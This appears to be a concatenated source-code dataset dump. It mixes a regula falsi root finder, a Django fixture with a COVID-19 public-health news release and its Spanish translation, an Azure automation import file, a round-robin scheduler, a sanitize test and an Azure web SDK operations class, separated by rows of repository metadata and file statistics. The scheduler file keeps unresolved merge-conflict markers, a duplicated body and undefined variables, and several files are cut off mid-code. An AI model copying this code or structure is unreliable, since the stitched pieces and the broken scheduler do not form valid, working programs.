e_x = fp_n
if e_x < 0:
t_r = e_x * -1.0
if t_r < tolerance:
break
else:
if fp_n > 0:
x = x_x
elif fp_n < 0:
x_0 = x_x
else:
if e_x < tolerance:
break
else:
if fp_n > 0:
x = x_x
elif fp_n < 0:
x_0 = x_x
n_iteration += 1
else:
fx_n_1 = evaluate(function, variable, x)
fx_n = evaluate(function, variable, x_0)
x_x_0 = x - x_0
x_x = (x - fx_n_1 * x_x_0 / (fx_n_1 - fx_n))
fp_n = evaluate(function, variable, x_x)
iterations['b_n'].append(x)
iterations['a_n'].append(x_0)
iterations['p_n'].append(x_x)
iterations['f_n'].append(fp_n)
e_x = fp_n
if e_x < 0:
t_r = e_x * -1.0
if t_r < tolerance or condition == e_x:
break
else:
if fp_n > 0:
x = x_x
elif fp_n < 0:
x_0 = x_x
condition = e_x
else:
if e_x < tolerance or condition == e_x:
break
else:
if fp_n > 0:
x = x_x
elif fp_n < 0:
x_0 = x_x
condition = e_x
n_iteration += 2
if limit != 0:
if n_iteration > limit:
break
else:
if n_iteration > 250:
break
data = DataFrame(iterations, columns=header)
return data if not just_root else iterations['p_n'][len(iterations['p_n']) - 1]
| 32.811966
| 104
| 0.452288
| 1,351
| 11,517
| 3.624722
| 0.068838
| 0.022871
| 0.017766
| 0.017153
| 0.851746
| 0.841944
| 0.818869
| 0.80049
| 0.768838
| 0.768838
| 0
| 0.035113
| 0.458453
| 11,517
| 350
| 105
| 32.905714
| 0.75004
| 0.137449
| 0
| 0.784173
| 0
| 0
| 0.025208
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017986
| false
| 0
| 0.007194
| 0
| 0.039568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
216f543361dddb41855bac2c6d9e52d2706c5e52
| 6,112
|
py
|
Python
|
joplin/pages/news_page/fixtures/helpers/components.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 15
|
2018-09-27T07:36:30.000Z
|
2021-08-03T16:01:21.000Z
|
joplin/pages/news_page/fixtures/helpers/components.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 183
|
2017-11-16T23:30:47.000Z
|
2020-12-18T21:43:36.000Z
|
joplin/pages/news_page/fixtures/helpers/components.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 12
|
2017-12-12T22:48:05.000Z
|
2021-03-01T18:01:24.000Z
|
'''
components.py contains elements that may be used
interchangeably with multiple fixtures
'''
from pages.home_page.models import HomePage
def home():
return HomePage.objects.first()
mvp_news_title = 'Health Authorities Continue to Stress the Importance of Stay at Home & Social Distancing Guidelines'
google_translated_mvp_news_title = 'Las autoridades de salud continúan enfatizando la importancia de permanecer en el hogar y las pautas de distancia social'
mvp_news_body = '<p>Austin, TX — An individual in their 20s is in critical condition at a local hospital. Austin-Travis County Interim Health Authority, Dr. Mark Escott, continues to urge the public to stay home except for essential activities to reduce the risk of spreading COVID-19.</p><p></p><p>“The health of the public is in the hands of the community,” said Dr. Escott. “It is important to understand that young people are not immune from serious illness. We implore the community to stay at home even if you are not feeling ill, and before leaving your house ask yourself ‘Is this trip necessary?’ It is the entire community’s responsibility to stop the spread, including our young adults and teens.”</p><p></p><p>People with mild symptoms may significantly contribute to further viral spread to others–including other patients and medical staff.</p><p></p><p>“Those who only present mild symptoms may be a significant contribution to spread and therefore, everyone should stay home unless absolutely necessary,” added Dr. Escott.</p><p></p><p>If you are exhibiting COVID-19 symptoms such as fever, dry cough and shortness of breath, call your health care provider or use <a href=\"http://fake.base.url/telehealth-resources/\">telehealth resources</a> before visiting a hospital or urgent care clinic. Individuals who are uninsured or without an established provider can call the CommUnity Care COVID-19 Hotline at <a href=\"tel:512-978-8775\">512-978-8775</a> for guidance.</p><p></p><p>A healthcare provider will determine if there is another plausible diagnosis with similar symptoms (i.e. influenza). For suspected COVID-19 cases, your doctor will fill out a form. Austin Public Health (APH) will use this information to assess risk and criteria to determine whether a test is appropriate.</p><p></p><p>APH continues to stress the importance of practicing good personal hygiene and maintaining social distance during essential activities to disrupt the spread of the virus.</p><p></p><p>Proper hygiene practices include:</p><ul><li>Wash your hands often with soap and water for at least 20 seconds. If soap and water are unavailable, use an alcohol-based hand sanitizer.</li><li>Avoid touching your eyes, nose, and mouth with unwashed hands.</li><li>Avoid close contact with people who are sick.</li><li>Stay home when you are sick.</li><li>Cough or sneeze into your elbow or use a tissue to cover it, then throw the tissue in the trash.</li><li>Clean and disinfect frequently touched objects and surfaces.</li></ul><p>For more information and updates, visit <a href=\"http://www.AustinTexas.gov/COVID19\">www.AustinTexas.gov/COVID19</a>.</p>'
google_translated_mvp_news_body = '<p> Austin, TX - Un individuo de 20 años está en estado crítico en un hospital local. La Autoridad de Salud Provisional del Condado de Austin-Travis, Dr. Mark Escott, continúa instando al público a quedarse en casa, excepto por actividades esenciales para reducir el riesgo de propagar COVID-19. </p> <p> </p> <p> " La salud del público está en manos de la comunidad ”, dijo el Dr. Escott. “Es importante comprender que los jóvenes no son inmunes a las enfermedades graves. Implicamos a la comunidad que se quede en casa incluso si no se siente enfermo, y antes de salir de su casa pregúntese "¿Es necesario este viaje?" Es responsabilidad de toda la comunidad detener la propagación, incluidos nuestros adultos jóvenes y adolescentes ". < / p> <p> </p> <p> Las personas con síntomas leves pueden contribuir significativamente a una mayor propagación viral a otros, incluidos otros pacientes y personal médico. </p> <p> </p> <p> "Esos quienes solo presentan síntomas leves pueden ser una contribución significativa a la propagación y, por lo tanto, todos deben quedarse en casa a menos que sea absolutamente necesario ", agregó el Dr. Escott. </p> <p> </p> <p> Si está exhibiendo COVID-19 síntomas como fiebre, tos seca y falta de aliento, llame a su proveedor de atención médica o use <a href=\"http://fake.base.url/telehealth-resources/\"> recursos de telesalud </a> antes de visitar Un hospital o clínica de atención urgente. Las personas sin seguro o sin un proveedor establecido pueden llamar a la línea directa COVID-19 de CommUnity Care al <a href=\"tel:512-978-8775\"> 512-978-8775 </a> para obtener orientación. </ P > <p> </p> <p> Un proveedor de atención médica determinará si existe otro diagnóstico plausible con síntomas similares (es decir, influenza). Para casos sospechosos de COVID-19, su médico completará un formulario. Austin Public Health (APH) utilizará esta información para evaluar el riesgo y los criterios para determinar si una prueba es apropiada. </p> <p> </p> <p> APH continúa enfatizando la importancia de practicar una buena higiene personal y mantener distancia social durante las actividades esenciales para interrumpir la propagación del virus. </p> <p> </p> <p> Las prácticas de higiene adecuadas incluyen: </p> <ul> <li> Lávese las manos a menudo con agua y jabón por al menos 20 segundos. Si no hay agua y jabón disponibles, use un desinfectante para manos a base de alcohol. </li> <li> Evite tocarse los ojos, la nariz y la boca con las manos sin lavar. </li> <li> Evite el contacto cercano con personas enfermas . </li> <li> Quédese en casa cuando esté enfermo. </li> <li> Tosa o estornude en su codo o use un pañuelo para cubrirlo, luego tírelo a la basura. </li> <li > Limpie y desinfecte objetos y superficies que se tocan con frecuencia. </li> </ul> <p> Para obtener más información y actualizaciones, visite <a href=\"http://www.AustinTexas.gov/COVID19\"> www. AustinTexas.gov/COVID19 </a>. </p>'
| 359.529412
| 2,977
| 0.771597
| 1,008
| 6,112
| 4.668651
| 0.441468
| 0.01785
| 0.01785
| 0.0119
| 0.092223
| 0.073523
| 0.055249
| 0.055249
| 0.055249
| 0.037399
| 0
| 0.013825
| 0.147906
| 6,112
| 16
| 2,978
| 382
| 0.889209
| 0.014234
| 0
| 0
| 0
| 0.285714
| 0.96488
| 0.05759
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.714286
| 0.142857
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
21e18e5f0f861c7c99e9293a25b257de7375254d
| 181
|
py
|
Python
|
azure_automation_utility/__init__.py
|
WenJason/azure_automation_utility-master
|
13a95240907bd3d970ea382c1181d7de21c0ec91
|
[
"MIT"
] | 8
|
2018-09-14T08:05:51.000Z
|
2022-02-10T16:33:27.000Z
|
azure_automation_utility/__init__.py
|
WenJason/azure_automation_utility-master
|
13a95240907bd3d970ea382c1181d7de21c0ec91
|
[
"MIT"
] | 1
|
2019-10-04T18:32:15.000Z
|
2019-10-04T18:41:16.000Z
|
azure_automation_utility/__init__.py
|
WenJason/azure_automation_utility-master
|
13a95240907bd3d970ea382c1181d7de21c0ec91
|
[
"MIT"
] | 11
|
2018-09-10T15:12:43.000Z
|
2022-02-10T16:33:30.000Z
|
from .utility import get_automation_runas_credential
from .utility import get_automation_runas_token
from .utility import import_child_runbook
from .utility import load_webhook_body
| 45.25
| 52
| 0.895028
| 26
| 181
| 5.846154
| 0.5
| 0.289474
| 0.447368
| 0.263158
| 0.460526
| 0.460526
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082873
| 181
| 4
| 53
| 45.25
| 0.915663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
df109681beb2d2df59774904bd2fdc564f8d9b94
| 3,434
|
py
|
Python
|
src/rr.py
|
hrithikbhat019/OS-Simulation
|
76521b130c41aae3ba157b3f07e54f7db4ab374d
|
[
"MIT"
] | null | null | null |
src/rr.py
|
hrithikbhat019/OS-Simulation
|
76521b130c41aae3ba157b3f07e54f7db4ab374d
|
[
"MIT"
] | null | null | null |
src/rr.py
|
hrithikbhat019/OS-Simulation
|
76521b130c41aae3ba157b3f07e54f7db4ab374d
|
[
"MIT"
] | 1
|
2020-05-28T05:53:36.000Z
|
2020-05-28T05:53:36.000Z
|
<<<<<<< HEAD
from queue import *
from operator import itemgetter
def rr(data):
process = {}
process['table'] = data
process['gantt'] = []
Q = Queue(maxsize=50)
time = 0
left = n
flag = 0
a_tat = 0.0
a_wt = 0.0
process['table'] = sorted(process['table'], key=itemgetter('at'))
time = process['table'][0]['at']
for x in process['table']:
if x['at']==time:
Q.put(x)
#print process
while left!=0:
flag = 0
prev = time
a = not Q.empty()
if a:
temp = Q.get()
gtemp = {}
gtemp['no'] = temp['no']
#print temp
if temp['bt']<=tq:
gtemp['start'] = time
time += temp['bt']
gtemp['stop'] = time
temp['bt'] = 0
flag = 1
else:
temp['bt'] -= tq
gtemp['start'] = time
time += tq
gtemp['stop'] = time
process['gantt'].append(gtemp);
else:
process['gantt'].append({'no' : -1, 'start' : time, 'stop' : time+1})
time += 1
for proc in process['table']:
if proc['at']>prev and proc['at']<=time:
Q.put(proc)
if flag==1:
left -= 1
temp['ct'] = time
temp['tat'] = temp['ct'] - temp['at']
temp['wt'] = temp['tat'] - temp['bt']
a_tat += temp['tat']
a_wt += temp['wt']
print 'Process %d has completed at time %d'%(temp['no'], time)
elif a:
Q.put(temp)
print process['gantt']
=======
from queue import *
from operator import itemgetter
def rr(data):
process = {}
process['table'] = data
process['gantt'] = []
Q = Queue(maxsize=50)
time = 0
left = n
flag = 0
a_tat = 0.0
a_wt = 0.0
process['table'] = sorted(process['table'], key=itemgetter('at'))
time = process['table'][0]['at']
for x in process['table']:
if x['at']==time:
Q.put(x)
#print process
while left!=0:
flag = 0
prev = time
a = not Q.empty()
if a:
temp = Q.get()
gtemp = {}
gtemp['no'] = temp['no']
#print temp
if temp['bt']<=tq:
gtemp['start'] = time
time += temp['bt']
gtemp['stop'] = time
temp['bt'] = 0
flag = 1
else:
temp['bt'] -= tq
gtemp['start'] = time
time += tq
gtemp['stop'] = time
process['gantt'].append(gtemp);
else:
process['gantt'].append({'no' : -1, 'start' : time, 'stop' : time+1})
time += 1
for proc in process['table']:
if proc['at']>prev and proc['at']<=time:
Q.put(proc)
if flag==1:
left -= 1
temp['ct'] = time
temp['tat'] = temp['ct'] - temp['at']
temp['wt'] = temp['tat'] - temp['bt']
a_tat += temp['tat']
a_wt += temp['wt']
print 'Process %d has completed at time %d'%(temp['no'], time)
elif a:
Q.put(temp)
print process['gantt']
>>>>>>> 6e16703d4696ce2b8fea3992d628c26052ff7d73
| 27.253968
| 81
| 0.415842
| 390
| 3,434
| 3.641026
| 0.141026
| 0.101408
| 0.039437
| 0.04507
| 0.969014
| 0.969014
| 0.969014
| 0.969014
| 0.969014
| 0.969014
| 0
| 0.031611
| 0.419627
| 3,434
| 125
| 82
| 27.472
| 0.680883
| 0.013395
| 0
| 0.972973
| 0
| 0
| 0.093972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.036036
| null | null | 0.036036
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
80370c255bedf0f3e4f774519e6467240602f1e6
| 228
|
py
|
Python
|
tests/test_utils.py
|
123joshuawu/orca
|
741856dc264ffd38a7de8c2da1847543fd8c84d1
|
[
"0BSD"
] | 6
|
2020-12-09T01:53:40.000Z
|
2021-04-12T16:05:45.000Z
|
tests/test_utils.py
|
123joshuawu/orca
|
741856dc264ffd38a7de8c2da1847543fd8c84d1
|
[
"0BSD"
] | 13
|
2020-12-04T20:42:33.000Z
|
2021-04-17T20:15:11.000Z
|
tests/test_utils.py
|
123joshuawu/orca
|
741856dc264ffd38a7de8c2da1847543fd8c84d1
|
[
"0BSD"
] | 1
|
2020-12-28T01:31:28.000Z
|
2020-12-28T01:31:28.000Z
|
from api.parser.utils import sanitize
def test_sanitize():
assert sanitize("hello world") == "hello world"
assert sanitize(" hello world ") == "hello world"
assert sanitize(" \thello\nworld ") == "hello world"
| 38
| 58
| 0.666667
| 27
| 228
| 5.592593
| 0.481481
| 0.331126
| 0.251656
| 0.317881
| 0.543046
| 0.543046
| 0.543046
| 0.543046
| 0
| 0
| 0
| 0
| 0.197368
| 228
| 6
| 59
| 38
| 0.825137
| 0
| 0
| 0.4
| 0
| 0
| 0.344978
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80456fe9eea88e562e4847a02e9a13bd6d61e996
| 122,866
|
py
|
Python
|
azure-mgmt-web/azure/mgmt/web/operations/hosting_environments_operations.py
|
HydAu/AzureSDKForPython
|
5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3
|
[
"Apache-2.0"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/hosting_environments_operations.py
|
HydAu/AzureSDKForPython
|
5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3
|
[
"Apache-2.0"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/hosting_environments_operations.py
|
HydAu/AzureSDKForPython
|
5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class HostingEnvironmentsOperations(object):
"""HostingEnvironmentsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def get_hosting_environment(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get properties of hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`HostingEnvironment
<azure.mgmt.web.models.HostingEnvironment>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('HostingEnvironment', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_hosting_environment(
self, resource_group_name, name, hosting_environment_envelope, custom_headers=None, raw=False, **operation_config):
"""
Create or update a hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param hosting_environment_envelope: Properties of hostingEnvironment
(App Service Environment)
:type hosting_environment_envelope: :class:`HostingEnvironment
<azure.mgmt.web.models.HostingEnvironment>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`HostingEnvironment
<azure.mgmt.web.models.HostingEnvironment>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(hosting_environment_envelope, 'HostingEnvironment')
# Construct and send request
def long_running_send():
request = self._client.put(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 400, 404, 409]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('HostingEnvironment', response)
if response.status_code == 202:
deserialized = self._deserialize('HostingEnvironment', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def delete_hosting_environment(
self, resource_group_name, name, force_delete=None, custom_headers=None, raw=False, **operation_config):
"""
Delete a hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param force_delete: Delete even if the hostingEnvironment (App
Service Environment) contains resources
:type force_delete: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if force_delete is not None:
query_parameters['forceDelete'] = self._serialize.query("force_delete", force_delete, 'bool')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
def long_running_send():
request = self._client.delete(url, query_parameters)
return self._client.send(request, header_parameters, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 400, 404, 409]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if response.status_code == 202:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def get_hosting_environment_diagnostics(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get diagnostic information for hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: list of :class:`HostingEnvironmentDiagnostics
<azure.mgmt.web.models.HostingEnvironmentDiagnostics>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[HostingEnvironmentDiagnostics]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_diagnostics_item(
self, resource_group_name, name, diagnostics_name, custom_headers=None, raw=False, **operation_config):
"""
Get diagnostic information for hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param diagnostics_name: Name of the diagnostics
:type diagnostics_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`HostingEnvironmentDiagnostics
<azure.mgmt.web.models.HostingEnvironmentDiagnostics>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics/{diagnosticsName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'diagnosticsName': self._serialize.url("diagnostics_name", diagnostics_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('HostingEnvironmentDiagnostics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_capacities(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get used, available, and total worker capacity for hostingEnvironment
(App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StampCapacityCollection
<azure.mgmt.web.models.StampCapacityCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/compute'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
